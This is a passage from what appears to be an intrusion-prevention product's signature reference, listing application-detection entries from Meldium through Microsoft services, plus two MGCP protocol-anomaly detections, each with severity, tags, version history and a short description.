Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-657-5211
Last changed: sgpkg-ips-657-5211
Description: Meldium is a password management tool from LogMeIn with Single-Sign-On that helps businesses access popular applications quickly and securely. The application service can be accessed at the website http://www.meldium.com, through browser extensions for Chrome, Firefox, Internet Explorer and Opera, or with apps on iOS and Android.
Back to top

Melon

About this situation: Melon usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-1110-5242
Last changed: sgpkg-ips-1764-5242
Description: The Melon app is used to connect with people aroung the world.
Back to top

Meltwater

About this situation: Application Meltwater detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Meltwater Group provides Meltwater News - public relations software delivers superior global media monitoring and analytics with better targeted media outreach, and Meltwater Buzz - social media marketing suite combines deep social media monitoring and analytics with efficient social engagement.
Back to top

Member-Evolution

About this situation: Application Member-Evolution detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Member Evolution is solutions for the Membership Management Marketplace including Event Conference software and Marketing features.
Back to top

MemberClicks

About this situation: Application MemberClicks detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MemberClicks offers membership management software that just makes sense for small-staff associations.
Back to top

Memberize

About this situation: Application Memberize detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Memberize is a management tool for organizing, tracking and analyzing groups of all sizes.
Back to top

MemberMouse

About this situation: Application MemberMouse detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MemberMouse is scalable WordPress membership plugin that allows you to accept payments, manage customers, deliver premium content in a password protected member's area, track critical business metrics.
Back to top

Memcached

About this situation: Memcached usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Storage
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-628-5211
Description: Memcached is a distributed memory caching system which is often used to speed up databases.
Back to top

Memeo

About this situation: Application Memeo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Memeo Inc traditionally focused in end-point backup, has taken its expertise in cloud-based data protection into the sync and share business market with Memeo C1.
Back to top

Memopal

About this situation: Application Memopal detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Memopal is online backup and online storage software that archives your files in real-time to a remote server.
Back to top

MemStash

About this situation: Application MemStash detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Memstash helps you remember anything by reminding you at just the right memorization schedule.
Back to top

Mendeley

About this situation: Mendeley usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This application and site allow users to discover research data, manage and share research, and collaborate with other researchers. Source: Wikipedia
Back to top

Mendix

About this situation: Application Mendix detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mendix is the app platform company for the enterprise. The Mendix App Platform enables companies to build, integrate and deploy web and mobile applications.
Back to top

Mennonite-Mutual-Aid

About this situation: Application Mennonite-Mutual-Aid detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mennonite Mutual Insurance Company partners with independent agencies to offer quality property and casualty insurance products throughout Ohio and Indiana.
Back to top

MenschUndMaschine

About this situation: Application MenschUndMaschine detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MenschUndMaschine is a company that provides of computer aided design and manufacturing and provides software solutions.
Back to top

Mentimeter

About this situation: Application Mentimeter detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mentimeter is the ultimate tool to interact with your audience, whether this is done in a business setting, to add dynamics to your lecture or simply for entertainment.
Back to top

Mention

About this situation: Application Mention detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mention create alerts on your name, brand, competitors and be informed in real-time of any mention on the web and social networks.
Back to top

MEO-Cloud

About this situation: Application MEO-Cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Meo Cloud - cloud storage service.
Back to top

Meraki

About this situation: Application Meraki detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cisco Meraki is provides cloud controlled WiFi, routing, and security. Secure and scalable, Cisco Meraki enterprise networks simply work.
Back to top

Merchant-Partners

About this situation: Application Merchant-Partners detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Merchant Partners provides a global internet-overlay network focused on providing secure, reliable, real-time transaction management. Transactions are captured at the POS through either our dial, IP or Host-to-Host communications network and presented to the corresponding banking or private network platform.
Back to top

MerchantOS

About this situation: Application MerchantOS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LightSpeed Cloud, formerly MerchantOS, makes point of sale software easy.
Back to top

Mercury

About this situation: Application Mercury detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mercury is a markets portal that provides tools for research and analytics.
Back to top

Merrill-Edge

About this situation: Application Merrill-Edge detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Merrill Edge offers access to the banking convenience of bank of America and investment capabilities.
Back to top

Merrill-Lynch

About this situation: Application Merrill-Lynch detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Merrill Lynch is the wealth management division of Bank of America that provides retirement and services for customers.
Back to top

Message Boards and Forums

About this situation: Sites that host message boards, bulletin boards and other unaffiliated discussion forums.
Context: URL Application Context
Severity: 1
Tags: Productivity, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that host message boards, bulletin boards and other unaffiliated discussion forums.
Back to top

Messengerfx

About this situation: messengerFX usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: This application supports MSN Messenger only.
Back to top

Meta AI

About this situation: Meta AI usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1836-5242
Last changed: sgpkg-ips-1836-5242
Description: Meta AI is a research division of Meta Platforms that develops artificial intelligence and augmented artificial reality technologies. This application is meant for blocking.
Back to top

Meta4

About this situation: Application Meta4 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Meta4 Global HR and Talent Management solutions on the cloud, HR Software, HRMS Software, HRIS Systems, HR Solutions Provider.
Back to top

Metacafe

About this situation: Metacafe usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-448-4219
Last changed: sgpkg-ips-630-5211
Description: Metacafe is a video sharing web site where users upload, view and share video clips. The application is available at the site https://www.metacafe.com.
Back to top

MetaLocator

About this situation: Application MetaLocator detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MetaLocator is the next generation of location management, proximity search and display for any Web site in any country. Postal code and location-aware search.
Back to top

Metaname

About this situation: Application Metaname detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Metaname is a domain name registrar company.
Back to top

MetaPack

About this situation: Application MetaPack detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: MetaPack provider of delivery management technology to enterprise retailers and retail delivery partners across the world.
Back to top

Metatrader

About this situation: MetaTrader usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Description: This platform allows online retail foreign exchange speculative traders to see live streaming prices and charts, to place orders, and to manage their accounts. Source: Wikipedia
Back to top

Method

About this situation: Application Method detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Method:CRM for QuickBooks - web-based platform, syncs your data in real-time and is fully customizable to your workflows.
Back to top

Methodologee

About this situation: Application Methodologee detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The simple way to create, organize, and share essential business processes and procedures.
Back to top

Metric-Stream

About this situation: Application Metric-Stream detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MetricStream provides solutions for quality management, regulatory compliance, risk management, and corporate governance. Its enterprise solutions are used by corporations in pharmaceutical, medical device, high tech manufacturing, energy, financial services, healthcare, manufacturing, food and beverages and automotive to manage quality processes, regulatory and industry-mandated compliance and corporate governance initiatives.
Back to top

Metricly

About this situation: Application Metricly detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Metricly allow companies connect to all of their business data in an easy to use dashboard. Includes plugins for dozens of online services that make it easy to get setup in just minutes, while data tools and visualizations help you gain insight and visibility into your business.
Back to top

MetricPulse

About this situation: Application MetricPulse detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MetricPulse is a Web-based software application for Web site owners and Internet marketers that aggregates and organizes a series of critical Internet metrics into one simple and powerful dashboard. MetricPulse tracks and transmits key information to marketers.
Back to top

Metrilo

About this situation: Application Metrilo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Metrilo helps online stores understand their customers better and improve their revenue and conversion rate metrics.
Back to top

Metro-International

About this situation: Metro International usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-601-5211
Last changed: sgpkg-ips-628-5211
Description: Metro is a daily free newspaper published various countries as localized editions.
Back to top

MetroFax

About this situation: Application MetroFax detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MetroFax helps send and receive faxes from your PC or Mac using a Web-dashboard or email, and even from your smartphone with our new mobile apps for iPhone and Android.
Back to top

MetrologicGroup

About this situation: Application MetrologicGroup detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MetrologicGroup specializes in the design and manufacture of industry reputed 3D inspection software and electronics. It offers cloud analysis software with capabilities in metrology inspection with Metrolog X4.
Back to top

Metropix

About this situation: Application Metropix detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Metropix is floor plans and floor plan-related products to the real estate industry. With multiple ways to create plans, both on and offline, quick and easy customisation and the ability to upgrade classic 2D plans to sophisticated 3D and interactive models, Metropix has a solution for every need.
Back to top

MeYouHealth

About this situation: Application MeYouHealth detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MeYouHealth delivers a program that uses actions and social support to help people.
Back to top

MFG.com

About this situation: Application MFG.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MFG.com is a global online manufacturing marketplace. The company reportedly has more than 200,000 members around the world. Members include buyers, engineers, sourcing professionals, job shops and contract manufacturers
Back to top

MGCP_message_out_of_flow

About this situation: Message do not fit protocol standard.
Context: MGCP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-517-5211
Last changed: sgpkg-ips-1531-5242
Description: This situation occurs when an unexpected message is exchanged between a Media Gateway and a Call Manager. Normally the Media Gateway initiates communication by sending an RSIP message. Based on this information, the engine can distinguish both the Media Gateway and Call Agent connections. If the engine receives a command or a request that does not fit the ordinary message flow, it reports this situation. Important note: Please remember that this situation could be used when no multiple Call Manager are used. When there are multiple Call Managers, a different Call Manager may answer the Media Gateway request. Risk analysis: Risk level is medium.
Back to top

MGCP_unknown_command_message

About this situation: Unknown command.
Context: MGCP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-517-5211
Last changed: sgpkg-ips-1531-5242
Description: There are nine supported commands in MGCP: AUEP, AUCX, CRCX, DLCX, EPCF, MDCX, NTFY, RQNT, and RSIP. This situation occurs when the MGCP message is different than one of the known commands. Risk analysis: Risk level is low.
Back to top

Mgoon

About this situation: Mgoon usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Korean video streaming website.
Back to top

Mhelpdesk-Field-Service-Software

About this situation: Application Mhelpdesk-Field-Service-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mhelpdesk gives every small business field service technology. It is the way to manage, track, and schedule field technicians for any business in the service industry.
Back to top

Mibbit

About this situation: Mibbit usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is an instant messaging service. Mibbit supports Internet Relay Chat (IRC),Yahoo Messenger and Twitter. Its user interface operates entirely within a web browser and does not require any software installation. The Mibbit client has the ability to connect to multiple IRC servers, including servers that use SSL/TLS (HTTPS), and can join multiple channels. Source: Wikipedia
Back to top

Michael-Page

About this situation: Application Michael-Page detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Michael Page provides access to the best jobs and specialist recruitment expertise. Career, hiring and industry advice.
Back to top

MicroFocus

About this situation: Application MicroFocus detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MicroFocus provides software that allows companies to develop, test, deploy, assess and modernize enterprise applications. Its software enables customers business applications to respond to market changes and embrace architectures.
Back to top

Microgen

About this situation: Application Microgen detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Microgen develops, implements and supports business-critical software. With a detailed domain knowledge of specific markets Microgen enables it's customers to quickly realise business value from their investment in technology. Microgen's Financial Systems Division delivers a wide portfolio of back office processing software to the banking, wealth management and energy sectors. For trust administrators through to major fund and asset management organisations, Microgen provides solutions for front and back office administration, performance measurement
Back to top

Microsoft

About this situation: Microsoft online services usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Basic Internet Services, Application Routing
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-1814-5242
Description: Microsoft online services usage was detected.
Back to top

Microsoft .NET Framework

About this situation: Endpoint Context Agent based Microsoft .NET Framework detection
Context: EI Correlation
Severity: 1
Tags: Framework, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-989-5242
Description: A Microsoft .NET Framework endpoint application detected. Microsoft .NET Framework is a software framework developed by Microsoft.
Back to top

Microsoft Copilot

About this situation: Microsoft Copilot usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1836-5242
Last changed: sgpkg-ips-1836-5242
Description: Microsoft Copilot is an AI developed by Microsoft.
Back to top

Microsoft Edge

About this situation: Endpoint Context Agent based Microsoft Edge detection
Context: EI Correlation
Severity: 1
Tags: Web Browsers, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Microsoft Edge web browser endpoint application was detected.
Back to top

Microsoft Lync 2010

About this situation: Endpoint Context Agent based Microsoft Lync 2010
Context: EI Correlation
Severity: 1
Tags: IM, Endpoint
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Microsoft Lync 2010 endpoint application has been detected.
Back to top

Microsoft Lync 2013

About this situation: Endpoint Context Agent based Microsoft Lync 2013 detection
Context: EI Correlation
Severity: 1
Tags: IM, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Microsoft Lync 2013 endpoint application has been detected.
Back to top

Microsoft Malware Protection

About this situation: Endpoint Context Agent based Microsoft Malware Protection detection
Context: EI Correlation
Severity: 1
Tags: Security, Endpoint
First detected in: sgpkg-ips-991-5242
Last changed: sgpkg-ips-991-5242
Description: Microsoft Malware Protection endpoint application was detected.
Back to top

Microsoft Office 2007

About this situation: Endpoint Context Agent based Microsoft Office 2007 detection
Context: EI Correlation
Severity: 1
Tags: Business Apps, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Microsoft Office 2007 endpoint application has been detected.
Back to top

Microsoft Office 2010

About this situation: Endpoint Context Agent based Microsoft Office 2010 detection
Context: EI Correlation
Severity: 1
Tags: Business Apps, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Microsoft Office 2010 endpoint application has been detected.
Back to top

Microsoft Office 2013

About this situation: Endpoint Context Agent based Microsoft Office 2013 detection
Context: EI Correlation
Severity: 1
Tags: Business Apps, Endpoint
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Microsoft Office 2013 endpoint application has been detected.
Back to top

Microsoft Office 2016

About this situation: Endpoint Context Agent based Microsoft Office 2016 detection
Context: EI Correlation
Severity: 1
Tags: Business Apps, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Microsoft Office 2016 endpoint application has been detected.
Back to top

Microsoft Office Help Viewer

About this situation: Endpoint Context Agent based Microsoft Office Help Viewer detection
Context: EI Correlation
Severity: 1
Tags: Business Apps, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Microsoft Office Help Viewer endpoint application has been detected.
Back to top

Microsoft Office InfoPath

About this situation: Endpoint Context Agent based Microsoft Office InfoPath detection
Context: EI Correlation
Severity: 1
Tags: Business Apps, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Microsoft Office InfoPath endpoint application has been detected.
Back to top

Microsoft Office Subscription Licensing

About this situation: Endpoint Context Agent based Microsoft Office Subscription Licensing detection
Context: EI Correlation
Severity: 1
Tags: Business Apps, Endpoint
First detected in: sgpkg-ips-989-5242
Last changed: sgpkg-ips-989-5242
Description: Microsoft Office Subscription Licensing endpoint application has been detected.This service is used to determine the validity of the Microsoft Office subscription licence, for example when Office 365 service is in use.
Back to top

Microsoft Office Undefined Version

About this situation: Endpoint Context Agent based Microsoft Office detection
Context: EI Correlation
Severity: 1
Tags: Business Apps, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Microsoft Office endpoint application without a version number has been detected. Some Microsoft Office versions produce such connections when run for the first time.
Back to top

Microsoft OneDrive

About this situation: Endpoint Context Agent based Microsoft Onedrive detection
Context: EI Correlation
Severity: 1
Tags: Business Apps, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Microsoft OneDrive endpoint application was detected. OneDrive is a file hosting service operated by Microsoft.
Back to top

Microsoft OneNote

About this situation: Endpoint Context Agent based Microsoft OneNote detection
Context: EI Correlation
Severity: 1
Tags: Business Apps, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Microsoft OneNote endpoint application has been detected. Microsoft OneNote is a note taking application for Microsoft Windows.
Back to top

Microsoft Outlook

About this situation: Endpoint Context Agent based Microsoft Outlook
Context: EI Correlation
Severity: 1
Tags: Email, Endpoint
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Microsoft Outlook endpoint application has been detected.
Back to top

Microsoft Photos

About this situation: Endpoint Context Agent based Microsoft Photos detection
Context: EI Correlation
Severity: 1
Tags: Media, Endpoint
First detected in: sgpkg-ips-993-5242
Last changed: sgpkg-ips-993-5242
Description: Microsoft Photos endpoint application detected.
Back to top

Microsoft Solitaire

About this situation: Endpoint Context Agent based Microsoft Solitaire detection
Context: EI Correlation
Severity: 1
Tags: Gaming, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Microsoft Solitaire endpoint application has been detected.
Back to top

Microsoft SQL Management Studio

About this situation: Endpoint Context Agent based Microsoft SQL Management Studio
Context: EI Correlation
Severity: 1
Tags: Database, Endpoint
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Microsoft SQL Management Studio endpoint application has been detected.
Back to top

Microsoft Teams

About this situation: Endpoint Context Agent based Microsoft Teams detection
Context: EI Correlation
Severity: 1
Tags: Business Apps, Endpoint
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1075-5242
Description: Microsoft Teams endpoint application has been detected. Microsoft Teams is a team collaboration tool developed by Microsoft.
Back to top

Microsoft Windows Malicious Software Removal Tool

About this situation: Endpoint Context Agent based Microsoft Windows Malicious Software Removal Tool detection
Context: EI Correlation
Severity: 1
Tags: Security, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Microsoft Windows Malicious Software Removal Tool endpoint application detected. Microsoft Windows Malicious Software Removal Tool can be used for removing malicious software from Windows.
Back to top

Microsoft Windows Notification UI

About this situation: Endpoint Context Agent based Notification UI Implementation detection
Context: EI Correlation
Severity: 1
Tags: Non-Essential System Services, Endpoint
First detected in: sgpkg-ips-1093-5242
Last changed: sgpkg-ips-1093-5242
Description: Microsoft Windows Notification UI Implementation endpoint application was detected. The process is used by the "Pre-Staged GDR Notification" scheduled task which is used for remainding the user to upgrade their Windows 8.
Back to top

Microsoft Windows Sedsvc

About this situation: Endpoint Context Agent based sedsvc detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-1093-5242
Last changed: sgpkg-ips-1093-5242
Description: Microsoft Windows Sedsvc endpoint application detected. Sedsvc is used for ensuring seamless installation of quality updates on Windows 10.
Back to top

Microsoft-Active-Directory

About this situation: Microsoft Active Directory MSRPC traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-596-5211
Last changed: sgpkg-ips-1190-5242
Description: Active Directory (AD) is a directory service that Microsoft developed for Windows domain networks and included in most Windows Server operating systems as a set of processes and services. Source: Wikipedia. This Application can only be used for identifying Microsoft Active Directly traffic, but it cannot be effectively used for controlling (i.e. terminating) the traffic.
Back to top

Microsoft-Active-Protection-Service

About this situation: Microsoft Active Protection Service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-593-5211
Last changed: sgpkg-ips-1741-5242
Description: Microsoft Active Protection Service (MAPS), formerly known as Microsoft SpyNet, is the cloud service that enables clients to report key telemetry events and suspicious malware queries to the cloud and enables the cloud to provide real-time blocking responses back to the client. It is available for all Microsoft's antivirus products and services.
Back to top

Microsoft-Advertising

About this situation: Microsoft Advertising usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-1698-5242
Description: Microsoft Advertising usage has been detected.
Back to top

Microsoft-Ajax-CDN

About this situation: Microsoft Ajax CDN usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-1391-5242
Description: Microsoft Ajax Content Delivery Network (CDN) is a service provided by Microsoft that allows use of various popular Javascript libraries.
Back to top

Microsoft-Analytics

About this situation: Microsoft Analytics usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1698-5242
Description: Microsoft Analytics usage has been detected.
Back to top

Microsoft-Azure

About this situation: Microsoft Azure usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-488-5211
Last changed: sgpkg-ips-1814-5242
Description: Azure is computing and services platfrom hosted by Microsoft.
Back to top

Microsoft-Azure-Application-Proxy

About this situation: Microsoft Azure Application Proxy usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-1013-5242
Last changed: sgpkg-ips-1128-5242
Description: Microsoft Azure Application Proxy provides users a secure remote access to on-premises applications.
Back to top

Microsoft-Azure-Background-Services

About this situation: Microsoft Azure background services
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-1373-5242
Last changed: sgpkg-ips-1373-5242
Description: Microsoft Azure background services is a collection of services common to Azure based applications.
Back to top

Microsoft-Azure-Blob

About this situation: Microsoft Azure Blob service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-1453-5242
Description: Azure Blob service is a content delivery mechanism for Azure, a computing and services platfrom hosted by Microsoft.
Back to top

Microsoft-Azure-CDN

About this situation: Microsoft Azure CDN usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-1814-5242
Description: Azure CDN is a content delivery network for Azure, a computing and services platfrom hosted by Microsoft.
Back to top

Microsoft-Azure-Marketplace

About this situation: Application Microsoft-Azure-Marketplace detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Microsoft Azure Marketplace is an market for buying, and selling finished software as a service applications and premium data.
Back to top

Microsoft-Azure-Service-Bus

About this situation: Microsoft Azure Service Bus usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-773-5211
Last changed: sgpkg-ips-1373-5242
Description: Azure is a cloud computing platform created by Microsoft. The Service Bus is a component of Azure that provides enterprise service bus (ESB).
Back to top

Microsoft-Azure-Tables

About this situation: Microsoft Azure Tables usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-773-5211
Last changed: sgpkg-ips-1373-5242
Description: Azure is a cloud computing and infrastructure service created by Microsoft. Tables is a non-relational, key-value-pair, storage system.
Back to top

Microsoft-Certificate-Revocation-List-Service

About this situation: Microsoft Certificate Revocation List service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-508-5211
Last changed: sgpkg-ips-1769-5242
Description: When a client (such as a .NET application) is validating a certificate it is common to access the Microsoft Certificate Revocation List. Also, Windows Update uses the CRL service.
Back to top

Microsoft-Certificate-Services-Remote-Administration-Protocol

About this situation: Microsoft Certificate Services Remote Administration Protocol
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-759-5211
